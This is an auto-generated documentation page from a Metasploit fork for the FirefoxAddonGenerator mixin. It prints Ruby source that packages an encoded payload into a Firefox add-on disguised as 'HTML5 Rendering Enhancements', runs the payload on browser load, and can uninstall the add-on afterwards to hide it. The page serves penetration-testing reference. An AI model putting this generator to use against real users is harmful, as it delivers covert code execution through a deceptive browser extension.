adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c3f5bd3de2d1affa01e2f6c2066c6bb0fc6413bc
metasploit-gs/api/Msf/Exploit/Remote/FirefoxAddonGenerator.html
T

481 lines
22 KiB
HTML
Raw Normal View History

Reboot gh-pages
2026-05-08 17:08:43 +00:00
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Module: Msf::Exploit::Remote::FirefoxAddonGenerator
&mdash; Documentation by YARD 0.9.37
</title>
<link rel="stylesheet" href="../../../css/style.css" type="text/css" />
<link rel="stylesheet" href="../../../css/common.css" type="text/css" />
<script type="text/javascript">
pathId = "Msf::Exploit::Remote::FirefoxAddonGenerator";
relpath = '../../../';
</script>
<script type="text/javascript" charset="utf-8" src="../../../js/jquery.js"></script>
<script type="text/javascript" charset="utf-8" src="../../../js/app.js"></script>
</head>
<body>
<div class="nav_wrap">
<iframe id="nav" src="../../../class_list.html?1"></iframe>
<div id="resizer"></div>
</div>
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../../_index.html">Index (F)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span>
&raquo;
<span class="title">FirefoxAddonGenerator</span>
</div>
<div id="search">
<a class="full_list_link" id="class_list_link"
href="../../../class_list.html">
<svg width="24" height="24">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>
<div id="content"><h1>Module: Msf::Exploit::Remote::FirefoxAddonGenerator
</h1>
<div class="box_info">
<dl>
<dt>Includes:</dt>
<dd><span class='object_link'><a href="FirefoxPrivilegeEscalation.html" title="Msf::Exploit::Remote::FirefoxPrivilegeEscalation (module)">FirefoxPrivilegeEscalation</a></span></dd>
</dl>
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/remote/firefox_addon_generator.rb</dd>
</dl>
</div>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#generate_addon_xpi-instance_method" title="#generate_addon_xpi (instance method)">#<strong>generate_addon_xpi</strong>(cli) &#x21d2; Rex::Zip::Archive </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>application/x-xpinstall MIME type.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#initialize-instance_method" title="#initialize (instance method)">#<strong>initialize</strong>(info = {}) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Add in the supported datastore options.</p>
</div></span>
</li>
</ul>
<h3 class="inherited">Methods included from <span class='object_link'><a href="FirefoxPrivilegeEscalation.html" title="Msf::Exploit::Remote::FirefoxPrivilegeEscalation (module)">FirefoxPrivilegeEscalation</a></span></h3>
<p class="inherited"><span class='object_link'><a href="FirefoxPrivilegeEscalation.html#exec_shellcode_source-instance_method" title="Msf::Exploit::Remote::FirefoxPrivilegeEscalation#exec_shellcode_source (method)">#exec_shellcode_source</a></span>, <span class='object_link'><a href="FirefoxPrivilegeEscalation.html#js_exec-instance_method" title="Msf::Exploit::Remote::FirefoxPrivilegeEscalation#js_exec (method)">#js_exec</a></span>, <span class='object_link'><a href="FirefoxPrivilegeEscalation.html#js_target%3F-instance_method" title="Msf::Exploit::Remote::FirefoxPrivilegeEscalation#js_target? (method)">#js_target?</a></span>, <span class='object_link'><a href="FirefoxPrivilegeEscalation.html#run_payload-instance_method" title="Msf::Exploit::Remote::FirefoxPrivilegeEscalation#run_payload (method)">#run_payload</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../JSObfu.html" title="Msf::Exploit::JSObfu (module)">JSObfu</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../JSObfu.html#js_obfuscate-instance_method" title="Msf::Exploit::JSObfu#js_obfuscate (method)">#js_obfuscate</a></span></p>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="generate_addon_xpi-instance_method">
#<strong>generate_addon_xpi</strong>(cli) &#x21d2; <tt>Rex::Zip::Archive</tt>
</h3><div class="docstring">
<div class="discussion">
<p>application/x-xpinstall MIME type</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Rex::Zip::Archive</tt>)</span>
&mdash;
<div class='inline'>
<p>containing a .xpi, ready to be served with the</p>
</div>
</li>
<li>
<span class='type'></span>
<div class='inline'>
<p>nil if payload fails to generate</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/firefox_addon_generator.rb', line 51</span>
<span class='kw'>def</span> <span class='id identifier rubyid_generate_addon_xpi'>generate_addon_xpi</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='rparen'>)</span>
<span class='id identifier rubyid_zip'>zip</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Zip</span><span class='op'>::</span><span class='const'>Archive</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span>
<span class='id identifier rubyid_xpi_guid'>xpi_guid</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_guid'>rand_guid</span>
<span class='id identifier rubyid_p'>p</span> <span class='op'>=</span> <span class='id identifier rubyid_regenerate_payload'>regenerate_payload</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_encoded'>encoded</span>
<span class='id identifier rubyid_bootstrap_script'>bootstrap_script</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>function startup(data, reason) {</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_bootstrap_script'>bootstrap_script</span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_run_payload'>run_payload</span>
<span class='kw'>if</span> <span class='lparen'>(</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>AutoUninstall</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='id identifier rubyid_bootstrap_script'>bootstrap_script</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>%Q|</span><span class='tstring_content'>var xpi_guid = &quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_xpi_guid'>xpi_guid</span><span class='embexpr_end'>}</span><span class='tstring_content'>&quot;;</span><span class='tstring_end'>|</span></span>
<span class='id identifier rubyid_bootstrap_script'>bootstrap_script</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>%q|</span><span class='tstring_content'>
function uninstallMe() {
try { // Fx &lt; 4.0
Components.classes[&quot;@mozilla.org/extensions/manager;1&quot;]
.getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid);
} catch (e) {}
try { // Fx 4.0 and later
Components.utils.import(&quot;resource://gre/modules/AddonManager.jsm&quot;);
AddonManager.getAddonByID(xpi_guid, function(addon) {
addon.uninstall();
});
} catch (e) {}
}
uninstallMe();
</span><span class='tstring_end'>|</span></span>
<span class='kw'>end</span>
<span class='id identifier rubyid_bootstrap_script'>bootstrap_script</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_zip'>zip</span><span class='period'>.</span><span class='id identifier rubyid_add_file'>add_file</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>bootstrap.js</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_bootstrap_script'>bootstrap_script</span><span class='rparen'>)</span>
<span class='id identifier rubyid_zip'>zip</span><span class='period'>.</span><span class='id identifier rubyid_add_file'>add_file</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>chrome.manifest</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>content\t</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_xpi_guid'>xpi_guid</span><span class='embexpr_end'>}</span><span class='tstring_content'>\t./\noverlay\tchrome://browser/content/browser.xul\tchrome://</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_xpi_guid'>xpi_guid</span><span class='embexpr_end'>}</span><span class='tstring_content'>/content/overlay.xul\n</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_zip'>zip</span><span class='period'>.</span><span class='id identifier rubyid_add_file'>add_file</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>install.rdf</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>%Q|</span><span class='tstring_content'>&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;RDF xmlns=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot; xmlns:em=&quot;http://www.mozilla.org/2004/em-rdf#&quot;&gt;
&lt;Description about=&quot;urn:mozilla:install-manifest&quot;&gt;
&lt;em:id&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_xpi_guid'>xpi_guid</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/em:id&gt;
&lt;em:name&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ADDONNAME</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/em:name&gt;
&lt;em:version&gt;1.0&lt;/em:version&gt;
&lt;em:bootstrap&gt;true&lt;/em:bootstrap&gt;
&lt;em:unpack&gt;true&lt;/em:unpack&gt;
&lt;em:targetApplication&gt;
&lt;Description&gt;
&lt;em:id&gt;toolkit@mozilla.org&lt;/em:id&gt;
&lt;em:minVersion&gt;1.0&lt;/em:minVersion&gt;
&lt;em:maxVersion&gt;*&lt;/em:maxVersion&gt;
&lt;/Description&gt;
&lt;/em:targetApplication&gt;
&lt;em:targetApplication&gt;
&lt;Description&gt;
&lt;em:id&gt;{ec8030f7-c20a-464f-9b0e-13a3a9e97384}&lt;/em:id&gt;
&lt;em:minVersion&gt;1.0&lt;/em:minVersion&gt;
&lt;em:maxVersion&gt;*&lt;/em:maxVersion&gt;
&lt;/Description&gt;
&lt;/em:targetApplication&gt;
&lt;/Description&gt;
&lt;/RDF&gt;</span><span class='tstring_end'>|</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_zip'>zip</span><span class='period'>.</span><span class='id identifier rubyid_add_file'>add_file</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>overlay.xul</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>%q|</span><span class='tstring_content'>&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;overlay xmlns=&quot;http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul&quot;&gt;
&lt;script src=&quot;bootstrap.js&quot;/&gt;
&lt;script&gt;&lt;![CDATA[window.addEventListener(&quot;load&quot;, function(e) { startup(); }, false);]]&gt;&lt;/script&gt;
&lt;/overlay&gt;</span><span class='tstring_end'>|</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_zip'>zip</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="initialize-instance_method">
#<strong>initialize</strong>(info = {}) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Add in the supported datastore options</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/firefox_addon_generator.rb', line 17</span>
<span class='kw'>def</span> <span class='id identifier rubyid_initialize'>initialize</span><span class='lparen'>(</span><span class='id identifier rubyid_info'>info</span><span class='op'>=</span><span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='kw'>super</span><span class='lparen'>(</span><span class='id identifier rubyid_update_info'>update_info</span><span class='lparen'>(</span><span class='id identifier rubyid_info'>info</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Platform</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='qwords_beg'>%w{</span><span class='words_sep'> </span><span class='tstring_content'>java</span><span class='words_sep'> </span><span class='tstring_content'>linux</span><span class='words_sep'> </span><span class='tstring_content'>osx</span><span class='words_sep'> </span><span class='tstring_content'>solaris</span><span class='words_sep'> </span><span class='tstring_content'>win</span><span class='words_sep'> </span><span class='tstring_end'>}</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Payload</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='lbrace'>{</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>BadChars</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>DisableNops</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='kw'>true</span> <span class='rbrace'>}</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Targets</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span>
<span class='lbracket'>[</span>
<span class='lbracket'>[</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Universal (Javascript XPCOM Shell)</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Platform</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>firefox</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Arch</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='const'>ARCH_FIREFOX</span>
<span class='rbrace'>}</span>
<span class='rbracket'>]</span><span class='comma'>,</span>
<span class='lbracket'>[</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Native Payload</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Platform</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='qwords_beg'>%w{</span><span class='words_sep'> </span><span class='tstring_content'>java</span><span class='words_sep'> </span><span class='tstring_content'>linux</span><span class='words_sep'> </span><span class='tstring_content'>osx</span><span class='words_sep'> </span><span class='tstring_content'>solaris</span><span class='words_sep'> </span><span class='tstring_content'>win</span><span class='words_sep'> </span><span class='tstring_end'>}</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Arch</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='const'>ARCH_ALL</span>
<span class='rbrace'>}</span>
<span class='rbracket'>]</span>
<span class='rbracket'>]</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>DefaultTarget</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='int'>0</span>
<span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_register_options'>register_options</span><span class='lparen'>(</span><span class='lbracket'>[</span>
<span class='const'><span class='object_link'><a href="../../OptString.html" title="Msf::OptString (class)">OptString</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptString.html#initialize-instance_method" title="Msf::OptString#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ADDONNAME</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='kw'>true</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>The addon name.</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>HTML5 Rendering Enhancements</span><span class='tstring_end'>&quot;</span></span> <span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='const'><span class='object_link'><a href="../../OptBool.html" title="Msf::OptBool (class)">OptBool</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptBool.html#initialize-instance_method" title="Msf::OptBool#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>AutoUninstall</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='kw'>true</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Automatically uninstall the addon after payload execution</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span>
<span class='kw'>true</span>
<span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='rbracket'>]</span><span class='comma'>,</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_class'>class</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
<div id="footer">
Generated on Fri May 8 17:02:37 2026 by
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
0.9.37 (ruby-3.1.5).
</div>
</div>
</body>
</html>
Reference in New Issue Copy Permalink